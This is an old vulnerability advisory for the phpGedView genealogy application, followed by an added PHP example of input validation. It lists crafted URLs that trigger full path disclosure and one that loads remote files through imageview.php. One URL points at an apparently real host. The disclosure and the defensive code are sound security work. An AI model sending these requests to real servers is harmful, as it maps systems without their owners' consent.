Multiple full path disclosures in phpGedView 3.2 and prior:
phpGedView is a web-based family tree application for indexing and organizing
genealogical entries. A user can browse and present the information through
different queries.
This application has various input validation errors
and reveals some data to remote users.
#######################################################
variables 'level' and 'parent[0]' in file 'placelist.php'
#######################################################
If we change the value of the variable 'level' to one that does not exist...
http://[target]/phpGedView/placelist.php?level=01
http://[target]/phpGedView/placelist.php?level=4000000000
(number of error lines shown)
If we change the array value in the variable 'parent[0]' to a
nonexistent array value... or a letter:
http://[target]/phpGedView/placelist.php?action=show&level=1&parent[1]=Click+edit+and+change+me
http://[target]/phpGedView/placelist.php?action=show&parent[x]=Misnaged&level=0
http://dismarking.freefronthost.com/phpGedView/placelist.php?action=find&level=1&parent[x]=Click+edit+and+change+me
Here, if we change the variable 'level', we obtain the error again:
http://[target]/phpGedView/placelist.php?action=show&parent[x]=Misnaged&level=4000
(level=4000, number of error lines shown)
We can make some combinations...
###########################################################
variable 'pids[0]' in file timeline.php
###########################################################
If we change the value of the array 'pids[0]' to a nonexistent number
or a letter, we find the error again.
http://[target]/phpGedView/timeline.php?pids[x]=I2222
###########################################################
variable not defined in file 'help_text.php'
###########################################################
In this file, to cause an error we only need to invent a variable
(in the example, 'lala'):
http://[target]/bin/phpgedview/help_text.php?lala=lala
We again get full path disclosure.
############################################################
variable 'filename' in 'imageview.php'
############################################################
The variable 'filename' is not validated properly and permits importing
files from other sites:
http://[target]/imageview.php?filename=http://[remote]/logo.gif
and we can again obtain the full installation path:
http://[target]/imageview.php?filename=../ or some invalid data.
############################################################
changing the language name to a number causes a session crash
############################################################
When we change to another language, the end of the URL contains
the name of the language in use.
If we change this value to a number, we crash the session
and the full path is revealed.
http://[target]/phpGedView/individual.php?pid=I1&ged=pruebas2.ged&changelanguage=yes&NEWLANGUAGE=1
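Added example (not part of the original advisory and not phpGedView code): one way the parameters listed in the sections above could be validated before use, with error display turned off so that a failure cannot print the installation path. All function names, constants, limits and value formats are assumptions.

```php
<?php
// Added example: hypothetical helpers, not phpGedView code. Requires PHP 8.1+.
ini_set('display_errors', '0');  // never render warnings (and their paths) to clients
ini_set('log_errors', '1');      // keep them in the server log instead

const MAX_LEVEL = 9;                                  // assumed depth limit
const MEDIA_DIR = '/var/www/phpGedView/media';        // assumed, already-canonical path
const LANGUAGES = ['english', 'spanish', 'french'];   // assumed language names
const PLACE_RE  = '/^[\p{L}\p{N} .,\'-]{1,64}\z/u';   // assumed place-name format
const ID_RE     = '/^I[0-9]{1,9}\z/';                 // assumed from the page's I1, I2222

// 'level': digits only and bounded, so 4000000000 is rejected; "01" normalises to 1.
function clean_level(mixed $raw): ?int {
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 3) return null;
    $n = (int) $raw;
    return $n <= MAX_LEVEL ? $n : null;
}

// 'parent[]' / 'pids[]': keys must be exactly 0..n-1 (no parent[x], no lone parent[1]),
// and every value a string matching $pattern.
function clean_list(mixed $raw, int $min, int $max, string $pattern): ?array {
    if (!is_array($raw) || !array_is_list($raw)) return null;
    if (count($raw) < $min || count($raw) > $max) return null;
    foreach ($raw as $v) {
        if (!is_string($v) || preg_match($pattern, $v) !== 1) return null;
    }
    return $raw;
}

// 'filename': bare file name only (no scheme, no ../), resolved inside MEDIA_DIR.
function clean_media_path(mixed $raw): ?string {
    if (!is_string($raw) || $raw === '' || $raw !== basename($raw)) return null;
    $real = realpath(MEDIA_DIR . '/' . $raw);
    if ($real === false || !is_file($real)) return null;
    return str_starts_with($real, MEDIA_DIR . '/') ? $real : null;
}

// 'NEWLANGUAGE': strict allowlist, so a number never reaches the language loader.
function clean_language(mixed $raw): ?string {
    return is_string($raw) && in_array($raw, LANGUAGES, true) ? $raw : null;
}

// placelist.php-style use: 'parent' must hold exactly 'level' entries (assumed rule).
// timeline.php-style use would be clean_list($_GET['pids'] ?? [], 1, 10, ID_RE).
$level  = clean_level($_GET['level'] ?? '0');
$parent = $level === null ? null : clean_list($_GET['parent'] ?? [], $level, $level, PLACE_RE);
if ($parent === null) {
    http_response_code(400);
    exit('Bad request');
}
```

A well-formed ID or place name can still refer to a record that does not exist, so the lookup that follows validation also needs to handle a missing record without raising a warning.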
############################################################
Sincerely,
Lostmon (lostmon@gmail.com)
Thanks to estrella for being my light
Thanks to everyone who believes in me
Curiosity is what makes the mind move...